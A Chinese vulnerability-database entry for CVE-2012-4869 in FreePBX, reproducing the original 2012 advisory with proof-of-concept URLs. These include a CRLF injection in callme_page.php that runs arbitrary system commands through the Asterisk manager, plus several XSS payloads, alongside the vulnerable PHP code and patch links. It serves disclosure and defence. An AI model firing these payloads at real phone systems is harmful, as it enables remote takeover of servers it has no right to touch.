FreePBX 远程命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1120989 漏洞类型 代码注入
发布时间 2012-03-22 更新时间 2019-12-12
CVE编号 CVE-2012-4869 CNNVD-ID CNNVD-201203-383
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/18649
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201203-383
|漏洞详情
FreePBX(前称Asterisk Management Portal)是FreePBX项目的一套通过GUI(基于网页的图形化接口)配置Asterisk(IP电话系统)的工具。 FreePBX中的recordings/misc/callme_page.php中的callme_startcall函数中存在远程命令执行漏洞,该漏洞源于对用户提供的输入未经正确过滤。攻击者可利用该漏洞盗取基于cookie的认证证书,或者在受影响应用程序上下文中执行任意命令。FreePBX 2.9版本、2.10版本和早期版本中存在这些漏洞,其他版本也可能受到影响。
|漏洞EXP
Product: FreePBX
Version: 2.10.0, 2.9.0 and perhaps earlier versions
Type: Remote Command Execution, XSS
Release Date: March 14, 2012
Vendor Notification Date: Jun 12, 2011
Author: Martin Tschirsich


Overview:


A remote command execution vulnerability and some XSS in current and earlier
FreePBX versions due to missing input sanitization.
FreePBX is a popular implementation (500,000 active phone systems) of
Asterisk (telephony software) based around a web-based configuration
interface and other tools. Some of these installations are on a public IP
address.


Proof of Concept:

RCE:
[HOST]/recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER]@from
-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A

XSS (2.9.0 and perhaps other versions):
[HOST]/panel/index_amp.php?context=[XSS]
[HOST]/panel/flash/mypage.php?clid=[XSS]
[HOST]/panel/flash/mypage.php?clidname=[base64_encode(XSS)]
[HOST]/panel/dhtml/index.php?context=/../%00">[XSS]
[HOST]/admin/views/freepbx_reload.php/"</script>[XSS]
[HOST]/recordings/index.php?login='>[XSS]


Details (RCE):

Missing input sanitization in htdocs/recordings/misc/callme_page.php:
// line 28-30:
$to         = $_REQUEST['callmenum']; // vulnerable
$msgFrom    = $_REQUEST['msgFrom'];
$new_path   = substr($path, 0, -4);     
// line 38:
$call_status = callme_startcall($to, $msgFrom, $new_path);

Missing input sanitization in htdocs/recordings/includes/callme.php:
// line 88-117:
function callme_startcall($to, $from, $new_path)
{
        global $astman;
        $channel        = "Local/$to () from-internal/n";  // vulnerable
        $context        = "vm-callme";
        $extension      = "s";
        $priority       = "1";
        $callerid       = "VMAIL/$from";
        ...
        /* Arguments to Originate: channel, extension, context, priority,
timeout, callerid, variable, account, application, data */
        $status = $astman->Originate($channel, $extension, $context,
$priority, NULL, $callerid, $variable, NULL, NULL, NULL, NULL);
        ...
}


Unofficial Patch (RCE, tested with 2.9.0):

Patch htdocs/recordings/modules/callme_page.php:
http://pastebin.com/ZbX50qaZ
Patch htdocs/recordings/modules/voicemail.module:
http://pastebin.com/vv3qczfC



Disclaimer:


The vendor has been contacted and provided with a patch several times since
Jun 12, 2011. Since no intention to address this issue was shown, I felt it
was in the best interest to disclose the vulnerability.

All information in this advisory is provided on an 'as is' basis in the hope
that it will be useful. The author not responsible for any risks or
occurrences caused by the application of this information.
|参考资料

来源:XF
名称:freepbx-callmepage-command-exec(74174)
链接:http://xforce.iss.net/xforce/xfdb/74174
来源:BID
名称:52630
链接:http://www.securityfocus.com/bid/52630
来源:www.freepbx.org
链接:http://www.freepbx.org/trac/ticket/5711
来源:EXPLOIT-DB
名称:18659
链接:http://www.exploit-db.com/exploits/18659
来源:EXPLOIT-DB
名称:18649
链接:http://www.exploit-db.com/exploits/18649
来源:SECUNIA
名称:48463
链接:http://secunia.com/advisories/48463
来源:FULLDISC
名称:20120320FreePBXremotecommandexecution,xss
链接:http://seclists.org/fulldisclosure/2012/Mar/234
来源:packetstormsecurity.org
链接:http://packetstormsecurity.org/files/111028/FreePBX-2.10.0-Remote-Command-Execution-XSS.html